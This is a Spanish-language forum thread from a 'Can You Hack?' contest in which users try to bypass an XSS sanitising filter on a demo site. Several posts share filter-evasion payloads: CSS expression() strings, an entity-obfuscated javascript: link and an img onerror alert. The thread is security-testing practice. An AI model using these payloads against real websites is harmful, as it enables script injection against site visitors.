[CYH] Bypass de filtros de XSS :)

sirdarckcat · 8 Abril 2010, 08:47 AM

Can You Hack?
Semi-allowhtml

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos

Hola!

Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/

Yo lo bypasee hace rato xD

<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div>

Asi que no esta muy dificil!

Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net

Saludos!!

tragantras · 8 Abril 2010, 13:50 PM

alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat

en concreto... el campo style de la etiqueta div

gracias y un saludo :3

jdc · 8 Abril 2010, 17:38 PM

Es parte de la celebración de abril negro?

No había puesto WHK el filtro de otra página?

sirdarckcat · 8 Abril 2010, 22:11 PM

el de WHK es PHPIDS
ese es otro

y no tiene nada que ver con abril negro xD

jdc · 8 Abril 2010, 22:15 PM

ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?

Código [Seleccionar]

<img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" />

jajajajaja

Shell Root · 8 Abril 2010, 22:23 PM

Raro, porque?, Creo que es CSS Injection

, Además si mal no recuerdo, expression es solo para IE!

Código (css) [Seleccionar]

<XSS STYLE="xss:expression(alert('XSS'))">...

yasión · 8 Abril 2010, 23:07 PM

Esto hace cosas raras:

Código (javascript) [Seleccionar]

<a href="></a>

Es lo primero que he probado, luego lo miro un poco más.

SeC · 10 Abril 2010, 03:36 AM

Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P

Código (html4strict) [Seleccionar]

<a href="javascr&#x0Aipt:a&#x0Alert(1);" target="_blank">asd</a>

cgvwzq · 14 Abril 2010, 20:36 PM

Quiero una cuenta... =P

Código [Seleccionar]

<script>><img src=x onerror=alert(/cuack/) tr=

Shell Root · 14 Abril 2010, 20:41 PM

jejejejeje